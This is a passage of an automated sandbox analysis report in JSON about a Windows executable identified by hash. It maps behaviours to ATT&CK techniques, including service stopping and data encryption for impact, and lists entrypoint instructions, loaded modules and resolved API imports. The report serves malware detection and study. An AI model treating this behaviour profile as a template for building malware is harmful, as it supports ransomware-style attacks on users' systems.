"https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "suspicious_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774\" file has an entrypoint instructions - \"call\t0x402c33,jmp\t0x402389,push\t0x14,push\t0x444358,call\t0x402f60,push\t1,call\t0x4029e8,pop\tecx,test\tal, al,je\t0x4024ef,xor\tbl, bl,mov\tbyte ptr [ebp - 0x19], bl,and\tdword ptr [ebp - 4], 0,call\t0x4028ed,mov\tbyte ptr [ebp - 0x24], al,mov\teax, dword ptr [0x44dd04],xor\tecx, ecx,inc\tecx,cmp\teax, ecx,je\t0x4024ef,test\teax, eax,jne\t0x402413,mov\tdword ptr [0x44dd04], ecx,push\t0x43c234,push\t0x43c218,call\t0x41c933,pop\tecx,pop\tecx,test\teax, eax,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ce0000\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" loaded module \"KERNEL32\" at base 75710000\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c140000\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" loaded module \"RPCRT4.DLL\" at base 755b0000\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" loaded module \"NTDLL.DLL\" at base 77270000\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" loaded module \"KERNEL32.DLL\" at base 75710000\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" loaded module \"OLEAUT32.DLL\" at base 75f40000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00005988)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 755B0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter ZwCreateSection (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter ZwMapViewOfSection (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter ZwUnmapViewOfSection (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter RtlNtStatusToDosError (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter ZwClose (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter ZwQueryInformationToken (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter ZwOpenProcess (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter ZwOpenProcessToken (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter _snwprintf (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter memcpy (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter strcpy (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter sprintf (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter mbstowcs (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter _snprintf (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter wcstombs (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter memset (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter _aulldiv (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter _allmul (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter _aullrem (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter RtlUnwind (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter NtQueryVirtualMemory (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter RaiseException (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter HeapAlloc (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter InterlockedIncrement (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter InterlockedDecrement (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter HeapFree (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter SetEvent (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter GetSystemTimeAsFileTime (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter HeapDestroy (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter HeapCreate (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter SwitchToThread (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter lstrlenA (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter SetWaitableTimer (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter Process32First (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter SleepEx (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter CreateEventA (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter lstrlenW (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter Process32Next (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter WaitForMultipleObjects (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter CreateWaitableTimerA (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter lstrcpyA (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter ResetEvent (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter lstrcmpW (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter EnterCriticalSection (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter LeaveCriticalSection (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSection (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter lstrcmpA (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter CreateFileMappingW (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter MapViewOfFile (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter InterlockedExchange (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter ExpandEnvironmentStringsW (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter ExpandEnvironmentStringsA (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter QueryPerformanceFrequency (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter OpenProcess (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter GetVersion (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessId (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter lstrcatA (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter QueryPerformanceCounter (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter GetComputerNameW (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter WideCharToMultiByte (UID: 00000000-00005988)\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetProcAddress\" with a parameter GetComputerNameExA (UID: 00000000-00005988)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"1300140054f48375@RPCRT4.dll\"\n \"15001600c03e4f6b@ADVAPI32.dll\"\n \"0e000f00703f4f6b@ADVAPI32.dll\"\n \"0e000f00cc3f4f6b@ADVAPI32.dll\"\n \"11001200b4474f6b@ADVAPI32.dll\"\n \"1100120048484f6b@ADVAPI32.dll\"\n \"120013008c484f6b@ADVAPI32.dll\"\n \"12001300e4484f6b@ADVAPI32.dll\"\n \"14001500dc6f4f6b@ADVAPI32.dll\"\n \"14001500f46f4f6b@ADVAPI32.dll\"\n \"140015000c704f6b@ADVAPI32.dll\"\n \"1700180024704f6b@ADVAPI32.dll\"\n \"0d000e003c704f6b@ADVAPI32.dll\"\n \"110012004c704f6b@ADVAPI32.dll\"\n \"1100120060704f6b@ADVAPI32.dll\"\n \"0d000e0034494f6b@SHELL32.dll\"\n \"0d000e00b0494f6b@SHELL32.dll\"\n \"0f001000a0714f6b@ADVAPI32.dll\"\n \"14001500e0714f6b@ADVAPI32.dll\"\n \"14001500f8714f6b@ADVAPI32.dll\"\n \"0c000d0040724f6b@ADVAPI32.dll\"\n \"0c000d0050724f6b@ADVAPI32.dll\"\n \"0e000f0060724f6b@ADVAPI32.dll\"\n \"0e000f0070724f6b@ADVAPI32.dll\"\n \"0b000c0080724f6b@ADVAPI32.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774\" was detected as 